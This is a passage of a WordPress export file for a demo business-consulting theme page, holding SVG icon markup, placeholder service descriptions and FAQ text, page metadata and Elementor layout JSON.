5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Government Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -9 512.00092 512"><path d="m243.273438 147.371094c-4.140626 0-7.5 3.359375-7.5 7.5v74.769531c0 4.144531 3.359374 7.5 7.5 7.5 4.144531 0 7.5-3.355469 7.5-7.5v-74.769531c0-4.140625-3.359376-7.5-7.5-7.5zm0 0"></path><path d="m152.441406 383.160156 64.75-37.386718c3.589844-2.070313 4.816406-6.65625 2.746094-10.242188s-6.660156-4.816406-10.242188-2.746094l-64.753906 37.386719c-3.585937 2.070313-4.816406 6.65625-2.746094 10.242187 2.082032 3.605469 6.675782 4.808594 10.246094 2.746094zm0 0"></path><path d="m383.484375 349.453125-64.753906-37.386719c-3.589844-2.070312-8.175781-.839844-10.246094 2.746094s-.839844 8.171875 2.746094 10.242188l64.753906 37.386718c1.179687.679688 2.46875 1.003906 3.742187 1.003906 2.589844 0 5.113282-1.34375 6.5-3.75 2.070313-3.585937.84375-8.171874-2.742187-10.242187zm0 0"></path><path d="m63.074219 331.53125c.371093 0 .75-.027344 1.128906-.085938 4.097656-.617187 6.914063-4.4375 6.292969-8.535156-1.378906-9.132812-2.078125-18.472656-2.078125-27.757812 0-71.730469 41.214843-135.011719 103.09375-165.410156 3.71875-1.828126 5.253906-6.320313 3.425781-10.039063-1.824219-3.714844-6.316406-5.25-10.035156-3.425781-67.039063 32.929687-111.484375 101.449218-111.484375 178.875 0 10.035156.757812 20.125 2.25 30 .558593 3.714844 3.757812 6.378906 7.40625 6.378906zm0 0"></path><path d="m170.335938 166.796875c-43.941407 28.21875-70.171876 76.203125-70.171876 128.355469 0 3.332031.117188 6.808594.355469 10.34375.273438 4.101562 3.8125 7.257812 7.980469 6.984375 4.132812-.277344 7.261719-3.855469 6.984375-7.984375-.214844-3.203125-.324219-6.347656-.324219-9.34375 0-47.023438 23.65625-90.289063 63.28125-115.738282 3.484375-2.238281 4.496094-6.875 2.257813-10.359374-2.238281-3.488282-6.878907-4.496094-10.363281-2.257813zm0 0"></path><path d="m320.199219 123.789062c8.589843 3.398438 17.015625 7.492188 25.039062 12.160157 62.003907 36.074219 95.972657 103.523437 91.128907 172.296875-.292969 4.128906 2.820312 7.714844 6.953124 8.007812.179688.011719.355469.015625.535157.015625 3.898437 0 7.195312-3.019531 7.472656-6.972656 5.25-74.5-31.621094-147.375-98.546875-186.3125-8.671875-5.042969-17.773438-9.464844-27.0625-13.144531-3.851562-1.523438-8.210938.363281-9.734375 4.214844-1.523437 3.851562.363281 8.207031 4.214844 9.734374zm0 0"></path><path d="m313.492188 171.933594c2.867187 1.421875 5.640624 2.90625 8.234374 4.417968 40.648438 23.648438 66.148438 65.855469 68.21875 112.902344.175782 4.023438 3.496094 7.167969 7.484376 7.167969.113281 0 .226562 0 .335937-.007813 4.140625-.179687 7.34375-3.683593 7.164063-7.820312-2.296876-52.171875-30.578126-98.976562-75.660157-125.207031-2.882812-1.675781-5.953125-3.324219-9.117187-4.890625-3.710938-1.839844-8.210938-.320313-10.050782 3.386718-1.839843 3.710938-.320312 8.210938 3.390626 10.050782zm0 0"></path><path d="m371.164062 436.148438c-7.078124 5.9375-14.6875 11.398437-22.609374 16.234374-61.472657 37.511719-136.953126 35-194.902344-1.839843-3.492188-2.222657-8.132813-1.191407-10.351563 2.304687-2.222656 3.496094-1.191406 8.128906 2.304688 10.351563 63.878906 40.613281 145.515625 41.800781 210.761719 1.984375 8.5625-5.222656 16.78125-11.125 24.4375-17.542969 3.171874-2.664063 3.585937-7.390625.925781-10.566406-2.660157-3.171875-7.390625-3.589844-10.566407-.925781zm0 0"></path><path d="m332.015625 425.285156c2.855469-1.738281 5.761719-3.65625 8.648437-5.695312 3.382813-2.386719 4.1875-7.066406 1.796876-10.449219-2.390626-3.382813-7.066407-4.1875-10.453126-1.800781-2.609374 1.847656-5.234374 3.574218-7.804687 5.140625-40.136719 24.5-89.390625 26.84375-131.757813 6.273437-3.726562-1.808594-8.214843-.253906-10.023437 3.472656-1.808594 3.722657-.253906 8.210938 3.472656 10.019532 46.933594 22.789062 101.5625 20.230468 146.121094-6.960938zm0 0"></path><path d="m506.246094 418.738281-153.742188-142.207031c-1.605468-1.488281-3.773437-2.199219-5.953125-1.945312l-45.195312 5.210937c-1.582031-5-3.917969-9.667969-6.863281-13.875l-6.4375-176.585937c-.148438-4.136719-3.628907-7.382813-7.765626-7.21875-4.140624.148437-7.371093 3.628906-7.222656 7.765624l5.882813 161.445313c-15.636719-9.433594-35.507813-9.710937-51.355469-.75l-24.09375-32.464844 45.523438-200.886719c.296874-1.3125 1.445312-2.226562 2.789062-2.226562h15.765625c1.546875 0 2.800781 1.210938 2.859375 2.753906l1.707031 46.886719c.152344 4.140625 3.652344 7.359375 7.769531 7.21875 4.136719-.148437 7.371094-3.625 7.222657-7.765625l-1.710938-46.886719c-.351562-9.648437-8.191406-17.207031-17.847656-17.207031h-15.765625c-8.398438 0-15.5625 5.722656-17.414062 13.910156l-46.285157 204.25c-.484375 2.132813-.011719 4.371094 1.289063 6.125l26.355468 35.511719c-7.160156 7.457031-12.089843 17.070313-13.6875 27.757813l-193.675781 121.4375c-8.183593 5.128906-10.808593 15.699218-5.980469 24.058593l7.882813 13.65625c3.273437 5.664063 9.167969 8.941407 15.40625 8.941407 1.773437 0 3.574219-.265626 5.351563-.816407l45.554687-14.128906c3.957031-1.226563 6.171875-5.429687 4.941406-9.382813-1.226562-3.957031-5.425781-6.167968-9.382812-4.941406l-45.558594 14.128906c-1.28125.398438-2.652344-.136718-3.324219-1.300781l-7.882812-13.65625c-.773438-1.335937-.351563-3.027343.957031-3.851562l186.105469-116.6875c3.703125 18.878906 17.835937 34.054687 36.125 39.28125l-15.246094 35.195312-123.925781 38.4375c-3.957031 1.226563-6.167969 5.425781-4.941407 9.382813 1.226563 3.957031 5.429688 6.167968 9.386719 4.941406l127.21875-39.457031c2.085938-.648438 3.789063-2.175781 4.660157-4.183594l18.359374-42.386719c1.921876-.054687 3.816407-.214844 5.679688-.476562l218.09375 115.535156c2.683594 1.421875 5.558594 2.101562 8.390625 2.101562 6.167969 0 12.125-3.21875 15.433594-8.949218l7.886719-13.65625c4.195312-7.273438 2.824218-16.335938-3.339844-22.039063zm-253.636719-87.476562c-20.011719 0-36.109375-16.453125-36.109375-36.109375 0-19.941406 16.238281-36.105469 36.109375-36.105469 19.875 0 36.105469 16.195313 36.105469 36.105469 0 19.675781-15.972656 36.109375-36.105469 36.109375zm243.984375 102.015625-7.882812 13.65625c-.769532 1.335937-2.441407 1.820312-3.8125 1.09375l-205.929688-109.089844c15.308594-9.246094 24.945312-26.113281 24.742188-44.3125l41.136718-4.746094 151.214844 139.871094c.984375.914062 1.207031 2.363281.53125 3.527344zm0 0"></path></svg>	        
				<h5><a href="#">Natural Resources</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
			<h6>how we help</h6>		
			<h3>Align Costs with Strategy & Focus on Growth</h3>		
			<a href="http://wpdemo.archiwp.com/maxbizz/contacts/">get in touch</a>
			<h5>How It Works & How We Do It</h5>		
		<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.</p><p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable development of your organization from project.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
	        <h6>CORPORATE MANAGEMENT</h6>			
		<blockquote>“I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>		
			<h5>Business Planning & Strategy</h5>		
				In what areas do you provide management consulting? 
					<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p>				
				In which countries do you provide consulting services? 
					<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p>				
				How is a consulting project started and organized? 
					<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>977</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:25:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:25:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-consulting]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2c774f8","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6bc8536","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"ed430ae","elType":"widget","settings":{"title":"Services","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"017708c","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"f67d26f","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"977088c","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9348f7e","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"786190f","elType":"widget","settings":{"text":"Divider","color":"#FF8523","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":19,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"343704f","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#FF8523","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"a0bb326","elType":"widget","settings":{"title":"Brochures","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"f12bdfe","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"1396f28","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"4fa4a55","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9af4798","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"d4ee160","elType":"widget","settings":{"text":"Divider","color":"#FF8523","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":19,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"60ffced","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf.jpg","id":955},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"904e2fa","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"3c3d54a","elType":"widget","settings":{"title":"Strategic & Tactical Planning","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"dec0c01","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do 